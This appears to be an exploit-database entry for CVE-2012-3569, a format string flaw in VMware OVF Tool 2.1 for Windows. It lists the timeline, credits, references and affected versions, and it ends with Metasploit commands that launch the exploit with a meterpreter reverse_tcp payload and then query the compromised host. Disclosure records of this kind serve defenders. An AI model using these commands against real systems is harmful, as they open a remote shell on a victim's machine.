Timeline :

Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability the 2012-11-08
Metasploit PoC provided the 2013-02-04

PoC provided by :

Jeremy Brown
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s) :

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with :

VMware OVF Tool 2.1

Description :

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Commands :

use exploit/windows/browser/ovftool_format_string
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo